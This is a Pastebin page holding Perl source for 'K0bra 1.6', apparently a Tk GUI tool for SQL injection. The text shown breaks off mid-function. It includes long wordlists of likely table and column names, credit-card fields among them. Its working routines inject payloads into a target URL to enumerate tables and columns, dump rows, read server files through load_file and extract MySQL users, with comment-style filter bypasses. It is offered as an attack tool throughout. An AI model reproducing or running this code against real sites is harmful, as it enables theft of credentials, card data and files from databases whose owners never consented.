Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/perl
- #K0bra 1.6
- #Version Tk
- #Coded By Doddy H
- #The arrays are a collection of various tools I found on the web.
- my @buscar1 = (
- 'usuario', 'web_users',
- 'name', 'names',
- 'nombre', 'nombres',
- 'usuarios', 'member',
- 'members', 'admin_table',
- 'usuaris', 'admin',
- 'tblUsers', 'tblAdmin',
- 'user', 'users',
- 'username', 'usernames',
- 'web_usuarios', 'miembro',
- 'miembros', 'membername',
- 'admins', 'administrator',
- 'sign', 'config',
- 'USUARIS', 'cms_operadores',
- 'administrators', 'passwd',
- 'password', 'passwords',
- 'pass', 'Pass',
- 'mpn_authors', 'author',
- 'musuario', 'mysql.user',
- 'user_names', 'foro',
- 'tAdmin', 'tadmin',
- 'user_password', 'user_passwords',
- 'user_name', 'member_password',
- 'mods', 'mod',
- 'moderators', 'moderator',
- 'user_email', 'jos_users',
- 'mb_user', 'host',
- 'apellido_nombre', 'user_emails',
- 'user_mail', 'user_mails',
- 'mail', 'emails',
- 'email', 'address',
- 'jos_usuarios', 'tutorial_user_auth',
- 'e-mail', 'emailaddress',
- 'correo', 'correos',
- 'phpbb_users', 'log',
- 'logins', 'login',
- 'tbl_usuarios', 'user_auth',
- 'login_radio', 'registers',
- 'register', 'usr',
- 'usrs', 'ps',
- 'pw', 'un',
- 'u_name', 'u_pass',
- 'tbl_admin', 'usuarios_head',
- 'tpassword', 'tPassword',
- 'u_password', 'nick',
- 'nicks', 'manager',
- 'managers', 'administrador',
- 'BG_CMS_Users', 'tUser',
- 'tUsers', 'administradores',
- 'clave', 'login_id',
- 'pwd', 'pas',
- 'sistema_id', 'foro_usuarios',
- 'cliente', 'sistema_usuario',
- 'sistema_password', 'contrasena',
- 'auth', 'key',
- 'senha', 'signin',
- 'dir_admin', 'alias',
- 'clientes', 'tb_admin',
- 'tb_administrator', 'tb_login',
- 'tb_logon', 'tb_members_tb_member',
- 'calendar_users', 'cursos',
- 'tb_users', 'tb_user',
- 'tb_sys', 'sys',
- 'fazerlogon', 'logon',
- 'fazer', 'authorization',
- 'curso', 'membros',
- 'utilizadores', 'staff',
- 'nuke_authors', 'accounts',
- 'account', 'accnts',
- 'signup', 'leads',
- 'lead', 'associated',
- 'accnt', 'customers',
- 'customer', 'membres',
- 'administrateur', 'utilisateur',
- 'riacms_users', 'tuser',
- 'tusers', 'utilisateurs',
- 'amministratore', 'god',
- 'God', 'authors',
- 'wp_users', 'tb_usuarios',
- 'asociado', 'asociados',
- 'autores', 'autor',
- 'Users', 'Admin',
- 'Members', 'tb_usuario',
- 'Miembros', 'Usuario',
- 'Usuarios', 'ADMIN',
- 'USERS', 'USER',
- 'MEMBER', 'MEMBERS',
- 'USUARIO', 'USUARIOS',
- 'MIEMBROS', 'MIEMBRO',
- 'USR_NAME', 'about',
- 'access', 'admin_id',
- 'admin_name', 'admin_pass',
- 'admin_passwd', 'admin_password',
- 'admin_pwd', 'admin_user',
- 'admin_userid', 'admin_username',
- 'adminemail', 'adminid',
- 'administrator_name', 'adminlogin',
- 'adminmail', 'adminname',
- 'adminuser', 'adminuserid',
- 'adminusername', 'aid',
- 'aim', 'apwd',
- 'auid', 'authenticate',
- 'authentication', 'blog',
- 'cc_expires', 'cc_number',
- 'cc_owner', 'cc_type',
- 'cfg', 'cid',
- 'clientname', 'clientpassword',
- 'clientusername', 'conf',
- 'contact', 'converge_pass_hash',
- 'converge_pass_salt', 'crack',
- 'customers_email_address', 'customers_password',
- 'cvvnumber]', 'data',
- 'db_database_name', 'db_hostname',
- 'db_password', 'db_username',
- 'download', 'e_mail',
- 'emer', 'emni',
- 'emniplote', 'emri',
- 'fjalekalimi', 'fjalekalimin',
- 'full', 'gid',
- 'group', 'group_name',
- 'hash', 'hashsalt',
- 'homepage', 'icq',
- 'icq_number', 'id',
- 'id_group', 'id_member',
- 'images', 'ime',
- 'index', 'ip_address',
- 'kodi', 'korisnici',
- 'korisnik', 'kpro_user',
- 'last_ip', 'last_login',
- 'lastname', 'llogaria',
- 'login_admin', 'login_name',
- 'login_pass', 'login_passwd',
- 'login_password', 'login_pw',
- 'login_pwd', 'login_user',
- 'login_username', 'logini',
- 'loginkey', 'loginout',
- 'logo', 'logohu',
- 'lozinka', 'md5hash',
- 'mem_login', 'mem_pass',
- 'mem_passwd', 'mem_password',
- 'mem_pwd', 'member_id',
- 'member_login_key', 'member_name',
- 'memberid', 'memlogin',
- 'mempassword', 'my_email',
- 'my_name', 'my_password',
- 'my_username', 'myname',
- 'mypassword', 'myusername',
- 'nc', 'new',
- 'news', 'number',
- 'nummer', 'p_assword',
- 'p_word', 'pass_hash',
- 'pass_w', 'pass_word',
- 'pass1word', 'passw',
- 'passwordsalt', 'passwort',
- 'passwrd', 'perdorimi',
- 'perdoruesi', 'personal_key',
- 'phone', 'privacy',
- 'psw', 'punetoret',
- 'punonjes', 'pword',
- 'pwrd', 'salt',
- 'search', 'secretanswer',
- 'secretquestion', 'serial',
- 'session_member_id', 'session_member_login_key',
- 'sesskey', 'setting',
- 'sid', 'sifra',
- 'spacer', 'status',
- 'store', 'store1',
- 'store2', 'store3',
- 'store4', 'table_prefix',
- 'temp_pass', 'temp_password',
- 'temppass', 'temppasword',
- 'text', 'uid',
- 'uname', 'user_admin',
- 'user_icq', 'user_id',
- 'user_ip', 'user_level',
- 'user_login', 'user_n',
- 'user_pass', 'user_passw',
- 'user_passwd', 'user_pw',
- 'user_pwd', 'user_pword',
- 'user_pwrd', 'user_un',
- 'user_uname', 'user_username',
- 'user_usernm', 'user_usernun',
- 'user_usrnm', 'user1',
- 'useradmin', 'userid',
- 'userip', 'userlogin',
- 'usern', 'usernm',
- 'userpass', 'userpassword',
- 'userpw', 'userpwd',
- 'usr_n', 'usr_name',
- 'usr_pass', 'usr2',
- 'usrn', 'usrnam',
- 'usrname', 'usrnm',
- 'usrpass', 'warez',
- 'xar_name', 'xar_pass',
- 'nom dutilisateur', 'mot de passe',
- 'compte', 'comptes',
- 'aide', 'objectif',
- 'authentifier', 'authentification',
- 'Contact', 'fissure',
- 'client', 'clients',
- 'de donn?es', 'mot_de_passe_bdd',
- 't?l?charger', 'E-mail',
- 'adresse e-mail', 'Emer',
- 'complet', 'groupe',
- 'hachage', 'Page daccueil',
- 'Kodi', 'nom',
- 'connexion', 'membre',
- 'MEMBERNAME', 'mon_mot_de_passe',
- 'monmotdepasse', 'ignatiusj',
- 'caroline-du-nord', 'nouveau',
- 'Nick', 'passer',
- 'Passw', 'Mot de passe',
- 't?l?phone', 'protection de la vie priv?e',
- 'PSW', 'pWord',
- 'sel', 'recherche',
- 'de s?rie', 'param?tre',
- '?tat', 'stocker',
- 'texte', 'cvvnumber'
- );
- my @buscar2 = (
- 'name', 'user',
- 'user_name', 'user_username',
- 'uname', 'user_uname',
- 'usern', 'user_usern',
- 'un', 'user_un',
- 'mail', 'cliente',
- 'usrnm', 'user_usrnm',
- 'usr', 'admin_name',
- 'cla_adm', 'usu_adm',
- 'fazer', 'logon',
- 'fazerlogon', 'authorization',
- 'membros', 'utilizadores',
- 'sysadmin', 'email',
- 'senha', 'username',
- 'usernm', 'user_usernm',
- 'nm', 'user_nm',
- 'login', 'u_name',
- 'nombre', 'host',
- 'pws', 'cedula',
- 'userName', 'host_password',
- 'chave', 'alias',
- 'apellido_nombre', 'cliente_nombre',
- 'cliente_email', 'cliente_pass',
- 'cliente_user', 'cliente_usuario',
- 'login_id', 'sistema_id',
- 'author', 'user_login',
- 'admin_user', 'admin_pass',
- 'uh_usuario', 'uh_password',
- 'psw', 'host_username',
- 'sistema_usuario', 'auth',
- 'key', 'usuarios_nombre',
- 'usuarios_nick', 'usuarios_password',
- 'user_clave', 'membername',
- 'nme', 'unme',
- 'password', 'user_password',
- 'autores', 'pass_hash',
- 'hash', 'pass',
- 'correo', 'usuario_nombre',
- 'usuario_nick', 'usuario_password',
- 'userpass', 'user_pass',
- 'upw', 'pword',
- 'user_pword', 'passwd',
- 'user_passwd', 'passw',
- 'user_passw', 'pwrd',
- 'user_pwrd', 'pwd',
- 'authors', 'user_pwd',
- 'u_pass', 'clave',
- 'usuario', 'contrasena',
- 'pas', 'sistema_password',
- 'autor', 'upassword',
- 'web_password', 'web_username',
- 'tbladmins', 'sort',
- '_wfspro_admin', '4images_users',
- 'a_admin', 'account',
- 'accounts', 'adm',
- 'admin', 'admin_login',
- 'admin_userinfo', 'administer',
- 'administrable', 'administrate',
- 'administration', 'administrator',
- 'administrators', 'adminrights',
- 'admins', 'adminuser',
- 'art', 'article_admin',
- 'articles', 'artikel',
- 'ÃÜÂë', 'aut',
- 'autore', 'backend',
- 'backend_users', 'backenduser',
- 'bbs', 'book',
- 'chat_config', 'chat_messages',
- 'chat_users', 'client',
- 'clients', 'clubconfig',
- 'company', 'config',
- 'contact', 'contacts',
- 'content', 'control',
- 'cpg_config', 'cpg132_users',
- 'customer', 'customers',
- 'customers_basket', 'dbadmins',
- 'dealer', 'dealers',
- 'diary', 'download',
- 'Dragon_users', 'e107.e107_user',
- 'e107_user', 'forum.ibf_members',
- 'fusion_user_groups', 'fusion_users',
- 'group', 'groups',
- 'ibf_admin_sessions', 'ibf_conf_settings',
- 'ibf_members', 'ibf_members_converge',
- 'ibf_sessions', 'icq',
- 'images', 'index',
- 'info', 'ipb.ibf_members',
- 'ipb_sessions', 'joomla_users',
- 'jos_blastchatc_users', 'jos_comprofiler_members',
- 'jos_contact_details', 'jos_joomblog_users',
- 'jos_messages_cfg', 'jos_moschat_users',
- 'jos_users', 'knews_lostpass',
- 'korisnici', 'kpro_adminlogs',
- 'kpro_user', 'links',
- 'login_admin', 'login_admins',
- 'login_user', 'login_users',
- 'logins', 'logs',
- 'lost_pass', 'lost_passwords',
- 'lostpass', 'lostpasswords',
- 'm_admin', 'main',
- 'mambo_session', 'mambo_users',
- 'manage', 'manager',
- 'mb_users', 'member',
- 'memberlist', 'members',
- 'minibbtable_users', 'mitglieder',
- 'movie', 'movies',
- 'mybb_users', 'mysql',
- 'mysql.user', 'names',
- 'news', 'news_lostpass',
- 'newsletter', 'nuke_authors',
- 'nuke_bbconfig', 'nuke_config',
- 'nuke_popsettings', 'nuke_users',
- 'Óû§', 'obb_profiles',
- 'order', 'orders',
- 'parol', 'partner',
- 'partners', 'passes',
- 'passwords', 'perdorues',
- 'perdoruesit', 'phorum_session',
- 'phorum_user', 'phorum_users',
- 'phpads_clients', 'phpads_config',
- 'phpbb_users', 'phpBB2.forum_users',
- 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info',
- 'pma_table_info', 'poll_user',
- 'punbb_users', 'pwds',
- 'reg_user', 'reg_users',
- 'registered', 'reguser',
- 'regusers', 'session',
- 'sessions', 'settings',
- 'shop.cards', 'shop.orders',
- 'site_login', 'site_logins',
- 'sitelogin', 'sitelogins',
- 'sites', 'smallnuke_members',
- 'smf_members', 'SS_orders',
- 'statistics', 'superuser',
- 'sysadmins', 'system',
- 'sysuser', 'sysusers',
- 'table', 'tables',
- 'tb_admin', 'tb_administrator',
- 'tb_login', 'tb_member',
- 'tb_members', 'tb_user',
- 'tb_username', 'tb_usernames',
- 'tb_users', 'tbl',
- 'tbl_user', 'tbl_users',
- 'tbluser', 'tbl_clients',
- 'tbl_client', 'tblclients',
- 'tblclient', 'test',
- 'usebb_members', 'user_admin',
- 'user_info', 'user_list',
- 'user_logins', 'user_names',
- 'usercontrol', 'userinfo',
- 'userlist', 'userlogins',
- 'usernames', 'userrights',
- 'users', 'vb_user',
- 'vbulletin_session', 'vbulletin_user',
- 'voodoo_members', 'webadmin',
- 'webadmins', 'webmaster',
- 'webmasters', 'webuser',
- 'webusers', 'x_admin',
- 'xar_roles', 'xoops_bannerclient',
- 'xoops_users', 'yabb_settings',
- 'yabbse_settings', 'ACT_INFO',
- 'ActiveDataFeed', 'Category',
- 'CategoryGroup', 'ChicksPass',
- 'ClickTrack', 'Country',
- 'CountryCodes1', 'CustomNav',
- 'DataFeedPerformance1', 'DataFeedPerformance2',
- 'DataFeedPerformance2_incoming', 'DataFeedShowtag1',
- 'DataFeedShowtag2', 'DataFeedShowtag2_incoming',
- 'dtproperties', 'Event',
- 'Event_backup', 'Event_Category',
- 'EventRedirect', 'Events_new',
- 'Genre', 'JamPass',
- 'MyTicketek', 'MyTicketekArchive',
- 'News', 'PerfPassword',
- 'PerfPasswordAllSelected', 'Promotion',
- 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag',
- 'ProxyPriceInfo', 'Region',
- 'SearchOptions', 'Series',
- 'Sheldonshows', 'StateList',
- 'States', 'SubCategory',
- 'Subjects', 'Survey',
- 'SurveyAnswer', 'SurveyAnswerOpen',
- 'SurveyQuestion', 'SurveyRespondent',
- 'sysconstraints', 'syssegments',
- 'tblRestrictedPasswords', 'tblRestrictedShows',
- 'TimeDiff', 'Titles',
- 'ToPacmail1', 'ToPacmail2',
- 'UserPreferences', 'uvw_Category',
- 'uvw_Pref', 'uvw_Preferences',
- 'Venue', 'venues',
- 'VenuesNew', 'X_3945',
- 'tblArtistCategory', 'tblArtists',
- 'tblConfigs', 'tblLayouts',
- 'tblLogBookAuthor', 'tblLogBookEntry',
- 'tblLogBookImages', 'tblLogBookImport',
- 'tblLogBookUser', 'tblMails',
- 'tblNewCategory', 'tblNews',
- 'tblOrders', 'tblStoneCategory',
- 'tblStones', 'tblUser',
- 'tblWishList', 'VIEW1',
- 'viewLogBookEntry', 'viewStoneArtist',
- 'vwListAllAvailable', 'CC_info',
- 'CC_username', 'cms_user',
- 'cms_users', 'cms_admin',
- 'cms_admins', 'jos_user',
- 'table_user', 'bulletin',
- 'cc_info', 'login_name',
- 'admuserinfo', 'userlistuser_list',
- 'SiteLogin', 'Site_Login',
- 'UserAdmin', 'Admins',
- 'Login', 'Logins'
- );
- use Tk;
- use Tk::ROText;
- use Tk::Dialog;
- use LWP::UserAgent;
- use URI::Split qw(uri_split);
- if ( $^O eq 'MSWin32' ) {
- use Win32::Console;
- Win32::Console::Free();
- }
- installer();
- my $nave = LWP::UserAgent->new();
- $nave->timeout(5);
- $nave->agent(
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
- );
- my $color_fondo = "black";
- my $color_texto = "green";
- my $logo =
- MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
- $logo->title("K0bra 1.6 (C) Doddy Hackman 2012");
- $logo->geometry("500x620+20+20");
- $logo->resizable( 0, 0 );
- $menula = $logo->Frame(
- -relief => "sunken",
- -bd => 1,
- -background => $color_fondo,
- -foreground => $color_texto
- );
- my $menulnowaxm = $menula->Menubutton(
- -text => "Options",
- -underline => 1,
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto
- )->pack( -side => "left" );
- my $aboutnowaxm = $menula->Menubutton(
- -text => "About",
- -underline => 1,
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto
- )->pack( -side => "left" );
- my $exitnowaxm = $menula->Menubutton(
- -text => "Exit",
- -underline => 1,
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto
- )->pack( -side => "left" );
- $menula->pack( -side => "top", -fill => "x" );
- $menulnowaxm->command(
- -label => "Scan",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&nownow
- );
- $menulnowaxm->command(
- -label => "Scanner without checking",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&nownownow
- );
- $menulnowaxm->command(
- -label => "Get Details",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&details
- );
- $menulnowaxm->command(
- -label => "Fuzz Tables",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&fuzz
- );
- $menulnowaxm->command(
- -label => "Fuzz Columns",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&fuzzcol
- );
- $menulnowaxm->command(
- -label => "Mysql User",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&mynow
- );
- $menulnowaxm->command(
- -label => "load_file",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&myfile
- );
- $menulnowaxm->command(
- -label => "Dump",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&dum
- );
- $menulnowaxm->command(
- -label => "Hex",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&per1
- );
- $menulnowaxm->command(
- -label => "ASCII",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&per2
- );
- $menulnowaxm->command(
- -label => "Logs",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&openlogsk
- );
- $aboutnowaxm->command(
- -label => "About",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&aboutxa
- );
- $exitnowaxm->command(
- -label => "Exit",
- -background => $color_fondo,
- -foreground => $color_texto,
- -command => \&exitnow
- );
- $logo->Label(
- -text => "Target : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 20, -y => 40 );
- my $targetero = $logo->Entry(
- -width => 65,
- -text => "http://127.0.0.1:8080/sql.php?id=1",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 43, -x => 80 );
- $logo->Label(
- -text => "Bypass : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 20, -y => 80 );
- $logo->Optionmenu(
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto,
- -options => [ [ "--" => "--" ], [ "/*" => "/*" ], [ "%20" => "%20" ] ],
- -variable => \$var,
- -textvariable => \$bypass
- )->place( -x => 90, -y => 82 );
- $logo->Label(
- -text => "Details : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 190, -x => 60 );
- my $informatero = $logo->Listbox(
- -height => 10,
- -width => 50,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 150, -x => 130 );
- $logo->Label(
- -text => "Databases",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 340, -x => 65 );
- $logo->Label(
- -text => "Tables",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 340, -x => 215 );
- $logo->Label(
- -text => "Columns",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 340, -x => 345 );
- my $datero = $logo->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 380, -x => 40 );
- my $tablero = $logo->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 380, -x => 180 );
- my $columnero = $logo->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 380, -x => 320 );
- $logo->Label(
- -text => "Status : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 100, -y => 560 );
- my $tatus = $logo->Entry(
- -width => 35,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 160, -y => 563 );
- $datero->bind( "<Double-1>", [ \&getdbs ] );
- $tablero->bind( "<Double-1>", [ \&schematablesdb ] );
- $columnero->bind( "<Double-1>", [ \&schemacolumnsdb ] );
- MainLoop;
- sub nownownow {
- motor( $targetero->get, $bypass );
- }
- sub fuzz {
- my $page = $targetero->get;
- my $save = partimealmedio($page);
- $tablero->delete( "0.0", "end" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- my $count = "0";
- savefile( $save . ".txt", "\n" );
- if ( $page =~ /(.*)hackman(.*)/g ) {
- my $start = $1;
- my $end = $2;
- for my $table (@buscar2) {
- chomp $table;
- $tatus->configure( -text => "Fuzzing Tables ..." );
- $logo->update;
- $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
- $injection =
- $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $table
- . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854/g ) {
- $count++;
- $tablero->insert( "end", $table );
- savefile( $save . ".txt", "[Table Found] : $table" );
- }
- }
- }
- $tatus->configure( -text => " " );
- }
- sub fuzzcol {
- my $page = $targetero->get;
- my $save = partimealmedio($page);
- ( $pass1, $pass2 ) = &bypass($bypass);
- $columnero->delete( "0.0", "end" );
- $d = $tablero->curselection();
- for my $id (@$d) {
- my $table = $tablero->get($id);
- my $count = "0";
- savefile( $save . ".txt", "\n" );
- if ( $page =~ /(.*)hackman(.*)/ ) {
- my $start = $1;
- my $end = $2;
- savefile( $save . ".txt", "[Table] : $table" );
- for my $columns (@buscar1) {
- chomp $columns;
- $tatus->configure( -text => "Fuzzing columns ..." );
- $logo->update;
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
- $code =
- toma( $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $table
- . $pass2 );
- if ( $code =~ /ERTOR854/g ) {
- $columnero->insert( "end", $columns );
- savefile( $save . ".txt", "[Column Found] : $columns" );
- }
- }
- }
- }
- $tatus->configure( -text => " " );
- }
- sub per1 {
- my $he = MainWindow->new(
- -background => $color_fondo,
- -foreground => $color_texto
- );
- $he->title("Hex Converter (C) Doddy Hackman 2012");
- $he->geometry("420x70+20+20");
- $he->resizable( 0, 0 );
- $he->Label(
- -text => "Text : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 20, -y => 20 );
- my $cam = $he->Entry(
- -width => 30,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 24, -x => 65 );
- $he->Button(
- -text => "Encode",
- -width => 10,
- -command => \&paso1,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 255 );
- $he->Button(
- -text => "Decode",
- -width => 10,
- -command => \&paso2,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 325 );
- sub paso1 {
- my $caca = $cam->get();
- chomp $caca;
- $cam->configure( -text => encode($caca) );
- }
- sub paso2 {
- my $caca = $cam->get();
- chomp $caca;
- $cam->configure( -text => decode($caca) );
- }
- }
- sub per2 {
- my $hexae = MainWindow->new(
- -background => $color_fondo,
- -foreground => $color_texto
- );
- $hexae->title("Ascii Converter (C) Doddy Hackman 2012");
- $hexae->geometry("420x70+20+20");
- $hexae->resizable( 0, 0 );
- $hexae->Label(
- -text => "Text : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 20, -y => 20 );
- my $cama = $hexae->Entry(
- -width => 30,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 24, -x => 65 );
- $hexae->Button(
- -text => "Encode",
- -width => 10,
- -command => \&paso3,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 255 );
- $hexae->Button(
- -text => "Decode",
- -width => 10,
- -command => \&paso4,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 325 );
- sub paso3 {
- my $caca = $cama->get();
- chomp $caca;
- $cama->configure( -text => ascii($caca) );
- }
- sub paso4 {
- my $caca = $cama->get();
- chomp $caca;
- $cama->configure( -text => ascii_de($caca) );
- }
- }
- sub dum {
- my $pa = $targetero->get;
- $max = MainWindow->new(
- -background => $color_fondo,
- -foreground => $color_texto
- );
- $max->title("Dump Values");
- $max->geometry("480x380+20+20");
- $max->resizable( 0, 0 );
- $max->Label(
- -text => "Target : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 50, -y => 20 );
- my $tata = $max->Entry(
- -width => 40,
- -text => $pa,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 110 );
- $max->Label(
- -text => "Table : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 50, -y => 60 );
- my $tato = $max->Entry(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 105, -y => 63 );
- $max->Label(
- -text => "Column1 : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 90, -x => 50 );
- my $tatu = $max->Entry(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 130, -y => 93 );
- $max->Label(
- -text => "Column2 : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 130, -x => 50 );
- my $tita = $max->Entry(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 133, -x => 130 );
- $max->Button(
- -width => 10,
- -text => "Extract",
- -command => \&tengor,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 20, -x => 360 );
- $max->Label(
- -text => "Column1",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 100, -y => 180 );
- $max->Label(
- -text => "Column2",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 300, -y => 180 );
- my $duta1 = $max->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 210, -x => 70 );
- my $duta2 = $max->Listbox(
- -width => 23,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 210, -x => 260 );
- sub tengor {
- $duta1->delete( "0.0", "end" );
- $duta2->delete( "0.0", "end" );
- my $page = $tata->get;
- my $tabla = $tato->get;
- my $col1 = $tatu->get;
- my $col2 = $tita->get;
- my $save = partimealmedio($page);
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- if ( $page =~ /(.*)hackman(.*)/ ) {
- my $start = $1;
- my $end = $2;
- $concatx =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
- $val_code =
- toma( $start
- . $concatx
- . $end
- . $pass1 . "from"
- . $pass1
- . $tabla
- . $pass2 );
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
- if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
- $tota = $1;
- savefile( $save . ".txt", "[Table] : $tabla" );
- savefile( $save . ".txt", "[+] Length of the rows: $tota\n" );
- savefile( $save . ".txt", "[$col1] [$col2]\n" );
- for my $limit ( 0 .. $tota ) {
- chomp $limit;
- $logo->update;
- $injection =
- toma( $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $tabla
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
- savefile( $save . ".txt",
- "[$col1] : $1 [$col2] : $2" );
- $duta1->insert( "end", $1 );
- $duta2->insert( "end", $2 );
- }
- else {
- last;
- }
- }
- }
- else {
- $tatus->configure( -text => "Error" );
- }
- }
- }
- }
- sub myfile {
- my $pag = $targetero->get;
- $loa = MainWindow->new(
- -background => $color_fondo,
- -foreground => $color_texto
- );
- $loa->title("load_file helper");
- $loa->geometry("380x410+20+20");
- $loa->resizable( 0, 0 );
- $loa->Label(
- -text => "Target : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 20, -y => 20 );
- my $aa = $loa->Entry(
- -width => 40,
- -text => $pag,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 80 );
- $loa->Label(
- -text => "File : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 60, -x => 23 );
- my $tea = $loa->Entry(
- -width => 20,
- -text => "C:/xampp/htdocs/aca.txt",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 63, -x => 63 );
- $loa->Button(
- -text => "Encode",
- -width => 8,
- -command => \&eno,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 62, -x => 200 );
- $loa->Button(
- -text => "Show",
- -width => 8,
- -command => \&ena,
- -activebackground => $color_texto,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 62, -x => 263 );
- $loa->Label(
- -text => "Output",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 160, -y => 130 );
- my $mo = $loa->ROText(
- -width => 45,
- -height => 15,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 170, -x => 25 );
- sub eno {
- my $t = $tea->get;
- if ( $t =~ /0x/ ) {
- $tea->configure( -text => decode($t) );
- }
- else {
- $tea->configure( -text => encode($t) );
- }
- }
- sub ena {
- $mo->delete( "0.0", "end" );
- my $page = $aa->get;
- my $save = partimealmedio($page);
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- if ( $page =~ /(.*)hackman(.*)/g ) {
- my $start = $1;
- my $end = $2;
- my $file = $tea->get;
- chomp $file;
- $concat =
- "unhex(hex(concat(char(107,48,98,114,97),load_file("
- . $file
- . "),char(107,48,98,114,97))))";
- my $code = toma( $start . $concat . $end . $pass2 );
- chomp $code;
- if ( $code =~ /k0bra(.*)k0bra/s ) {
- my $word = $1;
- $mo->insert( "end", $word );
- savefile( $save . ".txt", "[File Found] : $file" );
- savefile( $save . ".txt", "\n[Source Start]\n" );
- savefile( $save . ".txt", "$word" );
- savefile( $save . ".txt", "\n[Source End]\n" );
- }
- else {
- $tatus->configure( -text => "Error" );
- }
- }
- }
- }
- sub mynow {
- my $p = $targetero->get;
- $mi = MainWindow->new(
- -background => $color_fondo,
- -foreground => $color_texto
- );
- $mi->title("Mysql Extractor");
- $mi->geometry("500x300+20+20");
